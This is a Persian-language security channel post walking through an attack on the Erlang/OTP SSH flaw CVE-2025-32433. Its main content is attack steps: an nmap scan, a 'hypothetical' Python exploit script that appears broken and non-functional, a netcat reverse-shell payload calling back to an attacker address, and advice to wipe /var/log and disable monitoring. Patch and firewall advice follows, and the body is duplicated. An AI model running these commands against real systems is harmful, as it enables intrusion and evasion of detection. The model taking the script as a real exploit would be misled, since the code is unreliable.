برای توضیح نحوه بهرهبرداری از آسیبپذیری CVE-2025-32433 در Erlang/OTP و پیادهسازی حمله، باید ابتدا به جزئیات فنی آسیبپذیری و مکانیزم آن توجه کرد. این آسیبپذیری مربوط به پردازش نادرست پیامهای پروتکل SSH است که میتواند منجر به اجرای کد از راه دور (RCE) شود. در ادامه، مراحل کلی بهرهبرداری از این آسیبپذیری و دستورات مرتبط را بررسی میکنیم.
1. شناخت محیط تارگت
قبل از هر چیز، مهاجم باید یک سیستم آسیبپذیر را شناسایی کند. این سیستمها معمولاً شامل دستگاههایی هستند که از Erlang/OTP با نسخههای مستعد آسیبپذیری استفاده میکنند. مثالهایی از این دستگاهها عبارتند از:
- Cisco NSO و ConfD
- دستگاههای OT/IoT
- سیستمهای مدیریت شبکه
2. شناسایی سرویس SSH قابل دسترس
مهاجم باید سرویس SSH روی سیستم تارگت را شناسایی کند. این کار معمولاً با استفاده از ابزارهایی مانند
این دستور پورت 22 (معمولاً پورت پیشفرض SSH) را اسکن کرده و الگوریتمهای SSH پشتیبانیشده توسط سیستم تارگت را شناسایی میکند.
3. تهیه ابزار بهرهبرداری (Exploit Script)
با توجه به اینکه PoC (Proof of Concept) برای این آسیبپذیری در دسترس عموم قرار گرفته است، مهاجم میتواند از این اسکریپتها استفاده کند. این ابزارها معمولاً به صورت اسکریپتهای Python یا C نوشته میشوند.
مثالی از یک اسکریپت بهرهبرداری (فرضی):
4. اجرای حمله
مهاجم میتواند از طریق اجرای اسکریپت فوق، حمله را شروع کند. مراحل کلی به شرح زیر است:
الف) آمادهسازی پیلود
مهاجم باید یک پیلود مخرب تهیه کند که میتواند شامل دستورات سیستمی برای اجرای کد از راه دور باشد. مثال:
این پیلود یک Reverse Shell ایجاد میکند که به مهاجم اجازه میدهد به سیستم تارگت دسترسی کامل پیدا کند.
ب) اجرای اسکریپت
مهاجم اسکریپت را با آدرس IP، پورت و پیلود مورد نظر اجرا میکند:
5. دسترسی به سیستم تارگت
اگر حمله موفق باشد، مهاجم میتواند از طریق اتصال Reverse Shell به سیستم تارگت دسترسی کامل پیدا کند. این دسترسی میتواند شامل انجام اعمال زیر باشد:
- دستکاری فایلها
- دسترسی به دادههای حساس
- اجرای دستورات سیستمی
- نصب بدافزار یا Backdoor
6. جلوگیری از تشخیص
مهاجمان معمولاً تلاش میکنند ردپای خود را پاک کنند تا از تشخیص حمله جلوگیری کنند. این کار میتواند شامل موارد زیر باشد:
- پاک کردن لاگهای سیستم (
- غیرفعال کردن ابزارهای مانیتورینگ
- تغییر تنظیمات فایروال یا SSH
7. تأثیرات حمله
در صورت موفقیت، مهاجم میتواند:
- کنترل کامل سیستم: دسترسی root یا مدیریتی به دستگاه تارگت.
- حملات DoS: باعث ایجاد اختلال در عملکرد دستگاه شود.
- دسترسی به دادههای حساس: اطلاعات محرمانه را سرقت یا دستکاری کند.
راهکارهای مقابله
برای جلوگیری از بهرهبرداری از این آسیبپذیری، توصیههای زیر ارائه میشود:
1. بهروزرسانی Erlang/OTP: نسخههای OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 را نصب کنید.
2. غیرفعال کردن SSH: اگر استفاده از SSH ضروری نیست، آن را غیرفعال کنید.
3. استفاده از فایروال: دسترسی به پورت SSH را محدود کنید.
4. نظارت بر لاگها: به دنبال فعالیتهای مشکوک در لاگهای سیستم باشید.
@TryHackBox
1. شناخت محیط تارگت
قبل از هر چیز، مهاجم باید یک سیستم آسیبپذیر را شناسایی کند. این سیستمها معمولاً شامل دستگاههایی هستند که از Erlang/OTP با نسخههای مستعد آسیبپذیری استفاده میکنند. مثالهایی از این دستگاهها عبارتند از:
- Cisco NSO و ConfD
- دستگاههای OT/IoT
- سیستمهای مدیریت شبکه
2. شناسایی سرویس SSH قابل دسترس
مهاجم باید سرویس SSH روی سیستم تارگت را شناسایی کند. این کار معمولاً با استفاده از ابزارهایی مانند
nmap انجام میشود. دستور زیر میتواند برای اسکن پورتهای باز و شناسایی خدمات SSH استفاده شود:nmap -p 22 <IP_target> --noscript ssh2-enum-algos
این دستور پورت 22 (معمولاً پورت پیشفرض SSH) را اسکن کرده و الگوریتمهای SSH پشتیبانیشده توسط سیستم تارگت را شناسایی میکند.
3. تهیه ابزار بهرهبرداری (Exploit Script)
با توجه به اینکه PoC (Proof of Concept) برای این آسیبپذیری در دسترس عموم قرار گرفته است، مهاجم میتواند از این اسکریپتها استفاده کند. این ابزارها معمولاً به صورت اسکریپتهای Python یا C نوشته میشوند.
مثالی از یک اسکریپت بهرهبرداری (فرضی):
import paramiko
import sys
def exploit(ip, port, payload):
try:
# ایجاد اتصال SSH
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# ارسال پیام خاصی که آسیبپذیری را فعال میکند
transport = paramiko.Transport((ip, port))
transport.start_client()
# ارسال پیلود مخرب
transport._send_message(payload)
print("[+] Exploit Sent!")
# اجرا و دسترسی به سیستم
stdin, stdout, stderr = client.exec_command("id")
print(stdout.read().decode())
except Exception as e:
print(f"[-] Failed: {e}")
if __name__ == "__main__":
if len(sys.argv) != 4:
print(f"Usage: {sys.argv[0]} <IP> <Port> <Payload>")
sys.exit(1)
ip = sys.argv[1]
port = int(sys.argv[2])
payload = sys.argv[3]
exploit(ip, port, payload)
4. اجرای حمله
مهاجم میتواند از طریق اجرای اسکریپت فوق، حمله را شروع کند. مراحل کلی به شرح زیر است:
الف) آمادهسازی پیلود
مهاجم باید یک پیلود مخرب تهیه کند که میتواند شامل دستورات سیستمی برای اجرای کد از راه دور باشد. مثال:
/bin/bash -c "nc -e /bin/bash <IP_Attacker> <Port>"
این پیلود یک Reverse Shell ایجاد میکند که به مهاجم اجازه میدهد به سیستم تارگت دسترسی کامل پیدا کند.
ب) اجرای اسکریپت
مهاجم اسکریپت را با آدرس IP، پورت و پیلود مورد نظر اجرا میکند:
python3 exploit.py <IP_Target> "/bin/bash -c 'nc -e /bin/bash <IP_attacker> <Port>'"
5. دسترسی به سیستم تارگت
اگر حمله موفق باشد، مهاجم میتواند از طریق اتصال Reverse Shell به سیستم تارگت دسترسی کامل پیدا کند. این دسترسی میتواند شامل انجام اعمال زیر باشد:
- دستکاری فایلها
- دسترسی به دادههای حساس
- اجرای دستورات سیستمی
- نصب بدافزار یا Backdoor
6. جلوگیری از تشخیص
مهاجمان معمولاً تلاش میکنند ردپای خود را پاک کنند تا از تشخیص حمله جلوگیری کنند. این کار میتواند شامل موارد زیر باشد:
- پاک کردن لاگهای سیستم (
/var/log/)- غیرفعال کردن ابزارهای مانیتورینگ
- تغییر تنظیمات فایروال یا SSH
7. تأثیرات حمله
در صورت موفقیت، مهاجم میتواند:
- کنترل کامل سیستم: دسترسی root یا مدیریتی به دستگاه تارگت.
- حملات DoS: باعث ایجاد اختلال در عملکرد دستگاه شود.
- دسترسی به دادههای حساس: اطلاعات محرمانه را سرقت یا دستکاری کند.
راهکارهای مقابله
برای جلوگیری از بهرهبرداری از این آسیبپذیری، توصیههای زیر ارائه میشود:
1. بهروزرسانی Erlang/OTP: نسخههای OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 را نصب کنید.
2. غیرفعال کردن SSH: اگر استفاده از SSH ضروری نیست، آن را غیرفعال کنید.
3. استفاده از فایروال: دسترسی به پورت SSH را محدود کنید.
4. نظارت بر لاگها: به دنبال فعالیتهای مشکوک در لاگهای سیستم باشید.
@TryHackBox
👍8
Try Hack Box
برای توضیح نحوه بهرهبرداری از آسیبپذیری CVE-2025-32433 در Erlang/OTP و پیادهسازی حمله، باید ابتدا به جزئیات فنی آسیبپذیری و مکانیزم آن توجه کرد. این آسیبپذیری مربوط به پردازش نادرست پیامهای پروتکل SSH است که میتواند منجر به اجرای کد از راه دور (RCE)…
نتیجهگیری
آسیبپذیری CVE-2025-32433 به دلیل سادگی بهرهبرداری و تأثیرات بالقوهاش، تهدیدی جدی برای سیستمهایی است که از Erlang/OTP استفاده میکنند. مهاجمان میتوانند از این آسیبپذیری برای دسترسی کامل به سیستمها و انجام حملات مختلف استفاده کنند. بنابراین، بهروزرسانی نرمافزارها و اجرای تدابیر امنیتی ضروری است.
⚠️ هشدار: این اطلاعات فقط برای مقاصد آموزشی ارائه شدهاند و هرگونه استفاده غیرقانونی از آنها ممنوع است.
#cve
@TryHackBox
آسیبپذیری CVE-2025-32433 به دلیل سادگی بهرهبرداری و تأثیرات بالقوهاش، تهدیدی جدی برای سیستمهایی است که از Erlang/OTP استفاده میکنند. مهاجمان میتوانند از این آسیبپذیری برای دسترسی کامل به سیستمها و انجام حملات مختلف استفاده کنند. بنابراین، بهروزرسانی نرمافزارها و اجرای تدابیر امنیتی ضروری است.
⚠️ هشدار: این اطلاعات فقط برای مقاصد آموزشی ارائه شدهاند و هرگونه استفاده غیرقانونی از آنها ممنوع است.
#cve
@TryHackBox
👍2